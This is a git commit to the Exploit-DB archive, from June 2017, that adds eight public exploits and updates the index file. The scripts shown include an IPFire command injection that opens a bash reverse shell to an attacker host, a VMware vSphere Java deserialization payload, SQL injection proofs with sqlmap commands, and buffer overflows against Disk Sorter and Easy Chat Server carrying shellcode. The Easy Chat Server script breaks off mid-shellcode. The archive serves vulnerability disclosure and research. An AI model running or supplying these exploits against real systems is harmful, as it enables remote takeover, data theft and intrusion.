From dea52f68f513756be8a8ca94c9b36a49939d12b6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 12 Jun 2017 05:01:24 +0000 Subject: [PATCH] DB: 2017-06-12 8 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC) Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow VMware vSphere Data Protection 5.x/6.x - Java Deserialization EFS Easy Chat Server 3.1 - Buffer Overflow (SEH) IPFire 2.19 - Remote Code Execution eCom Cart 1.3 - SQL Injection EFS Easy Chat Server 3.1 - Password Disclosure EFS Easy Chat Server 3.1 - Password Reset PaulShop - SQL Injection --- files.csv | 10 ++- platforms/linux/webapps/42149.py | 45 ++++++++++++ platforms/multiple/remote/42152.py | 50 ++++++++++++++ platforms/php/webapps/42151.txt | 28 ++++++++ platforms/php/webapps/42156.txt | 14 ++++ platforms/windows/local/42157.py | 87 +++++++++++++++++++++++ platforms/windows/remote/42155.py | 106 +++++++++++++++++++++++++++++ platforms/windows/webapps/42153.py | 40 +++++++++++ platforms/windows/webapps/42154.py | 45 ++++++++++++ 9 files changed, 424 insertions(+), 1 deletion(-) create mode 100755 platforms/linux/webapps/42149.py create mode 100755 platforms/multiple/remote/42152.py create mode 100755 platforms/php/webapps/42151.txt create mode 100755 platforms/php/webapps/42156.txt create mode 100755 platforms/windows/local/42157.py create mode 100755 platforms/windows/remote/42155.py create mode 100755 platforms/windows/webapps/42153.py create mode 100755 platforms/windows/webapps/42154.py diff --git a/files.csv b/files.csv index c11c59888..38f6cd37c 100644 --- a/files.csv +++ b/files.csv @@ -5526,7 +5526,7 @@ id,file,description,date,author,platform,type,port 42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0 42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0 42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0 -42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0 +42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,windows,dos,0 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0 42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0 @@ -9044,6 +9044,7 @@ id,file,description,date,author,platform,type,port 42142,platforms/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,windows,local,0 42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0 42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0 +42157,platforms/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15583,6 +15584,8 @@ id,file,description,date,author,platform,type,port 42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0 42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0 42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0 +42152,platforms/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",multiple,remote,0 +42155,platforms/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -37978,3 +37981,8 @@ id,file,description,date,author,platform,type,port 42132,platforms/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps,0 42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0 42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0 +42149,platforms/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,linux,webapps,0 +42151,platforms/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",php,webapps,0 +42153,platforms/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps,0 +42154,platforms/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps,0 +42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0 diff --git a/platforms/linux/webapps/42149.py b/platforms/linux/webapps/42149.py new file mode 100755 index 000000000..fd9b7ff99 --- /dev/null +++ b/platforms/linux/webapps/42149.py @@ -0,0 +1,45 @@ +# +# Title : IPFire 2.19 Firewall Post-Auth RCE +# Date : 09/06/2017 +# Author : 0x09AL (https://twitter.com/0x09AL) +# Tested on: IPFire 2.19 (x86_64) - Core Update 110 +# Vendor : http://www.ipfire.org/ +# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso +# Vulnerability Description: +# The file ids.cgi doesn't sanitize the OINKCODE parameter and gets passed to a system call which call wget. +# You need valid credentials to exploit this vulnerability or you can exploit it through CSRF. +# +# + +import requests + + +# Adjust the ip and ports. + +revhost = '192.168.56.1' +revport = 1337 +url = 'https://192.168.56.102:444/cgi-bin/ids.cgi' +username = 'admin' +password = 'admin' + + +payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1' +evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'} +headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'} + + +def verifyVuln(): + req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed. + if(req.status_code == 200 and "uid=99(nobody)" in req.text): + print "[+] IPFire Installation is Vulnerable [+]" + revShell() + else: + print "[+] Not Vulnerable [+]" + +def revShell(): + evildata["OINKCODE"] = '`' + payload + '`' + print "[+] Sending Malicious Payload [+]" + req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) + + +verifyVuln() diff --git a/platforms/multiple/remote/42152.py b/platforms/multiple/remote/42152.py new file mode 100755 index 000000000..e027398ed --- /dev/null +++ b/platforms/multiple/remote/42152.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python + + +import socket +import sys +import ssl + + +def getHeader(): + return '\x4a\x52\x4d\x49\x00\x02\x4b' + +def payload(): + cmd = sys.argv[4] + cmdlen = len(cmd) + data2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74' + data2 += '\x00' + chr(cmdlen) + data2 += cmd + data2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f' + return data2 + +def sslMode(): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) + return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL") + +def exploitTarget(sock): + server_address = (sys.argv[1], int(sys.argv[2])) + print 'connecting to %s port %s' % server_address + sock.connect(server_address) + print 'sending exploit headers\n' + sock.send(getHeader()) + sock.recv(8192) + print 'sending exploit\n' + sock.send(payload()) + sock.close() + print 'exploit completed.' + +if __name__ == "__main__": + if len(sys.argv) != 5: + print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd' + print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"' + sys.exit(0) + else: + sock = None + if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True: + sock = sslMode() + if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) + exploitTarget(sock) + + diff --git a/platforms/php/webapps/42151.txt b/platforms/php/webapps/42151.txt new file mode 100755 index 000000000..57d6996e0 --- /dev/null +++ b/platforms/php/webapps/42151.txt @@ -0,0 +1,28 @@ +# Exploit Title: eCom Cart 1.3 Exploit +# Google Dork: inurl:"/pdetails/11" ([11] is variable) +# Date: 10.06.2017 +# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci +# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 +# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 +# Version: 1.3 +# Tested on: Linux + + + +$ curl http://localhost/ecom-cart/charge.php -d order_id=%271 + +Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access +violation: 1064 You have an error in your SQL syntax; check the manual +that corresponds to your MariaDB server version for the right syntax +to use near '1'' at line 1 in +/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16 +Stack trace: +#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16): +PDO->query('SELECT * FROM 3...') +#1 {main} + thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php +on line 16 + +$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs + + diff --git a/platforms/php/webapps/42156.txt b/platforms/php/webapps/42156.txt new file mode 100755 index 000000000..cffcb500c --- /dev/null +++ b/platforms/php/webapps/42156.txt @@ -0,0 +1,14 @@ +# Exploit Title: [PaulShop CMS <= 2017-03-25 Sql Injection] +# Date: [10-06-2017] +# Exploit Author: [Se0pHpHack3r] +# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714] +# Version: [2017-03-25] + +1. Description + +SQL Injection on Shipping Cost page in Cart, with "country" & "weight" parameter (GET) + +2. Examples + +http://localhost/shop/en/cart/shipping_cost?country=[SQL INJECTION HERE] +http://localhost/shop/en/cart/shipping_cost?country=TH&weight=[SQL INJECTION HERE] \ No newline at end of file diff --git a/platforms/windows/local/42157.py b/platforms/windows/local/42157.py new file mode 100755 index 000000000..ef38cddbd --- /dev/null +++ b/platforms/windows/local/42157.py @@ -0,0 +1,87 @@ +#!/usr/bin/python + +############################################################################### +# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow +# Date: 10-06-2017 +# Exploit Author: abatchy17 -- @abatchy17 +# Vulnerable Software: DiskSorter v9.7.14 +# Vendor Homepage: http://www.disksorter.com/ +# Version: 9.7.14 +# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe +# Tested On: Windows XP SP3 +# +# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box +# +# Credit to n3ckD_ for discovering the DoS exploit +# +# Challenges to convert this DoS to code execution: +# 1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish) +# 2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c +# 3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory +# +# +----------------------------------+ +# |1 custom shellcode == 1 dead llama| +# +----------------------------------+ +# +############################################################################## + +a = open("exploit.txt", "w") + +# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False + +badchars = "\x0a\x0d\x2f" + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f" +buf = "" +buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43" +buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b" +buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63" +buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37" +buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55" +buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f" +buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70" +buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c" +buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37" +buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51" +buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32" +buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61" +buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69" +buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d" +buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33" +buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76" +buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47" +buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50" +buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50" +buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f" +buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53" +buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50" +buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30" +buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65" +buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d" +buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a" +buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50" +buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63" +buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54" +buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41" + +jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! + +llamaleftovers = ( + "\x55" # push EBP + "\x58" # pop EAX + "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 + "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 + "\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 209 + "\x40" # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode + ) + +junk = "\x55" + + "\x53\x5b" * 105 + +data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf + +a.write(data) +a.close() diff --git a/platforms/windows/remote/42155.py b/platforms/windows/remote/42155.py new file mode 100755 index 000000000..fc6fd68b5 --- /dev/null +++ b/platforms/windows/remote/42155.py @@ -0,0 +1,106 @@ +# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH) +# Date: 09/10/2017 +# Software Link: http://echatserver.com/ecssetup.exe +# Exploit Author: Aitezaz Mohsin +# Vulnerable Version: v2.0 to v3.1 +# Vulnerability Type: Buffer Overflow +# Severity: Critical +# Tested on: [Windows XP Sp3 Eng] + + +# ====================================================================================================================== +# Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability. +# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. +# ====================================================================================================================== + +# USAGE: python exploit.py ip + +#!/usr/bin/python + +import os +import sys +import socket + +ip = sys.argv[1] + +socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) + +socket.connect((ip , 80)) + +#AlphanumericShellcode + +shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43" +"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41" +"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" +"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" +"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33" +"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44" +"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30" +"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a" +"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43" +"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47" +"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c" +"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43" +"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55" 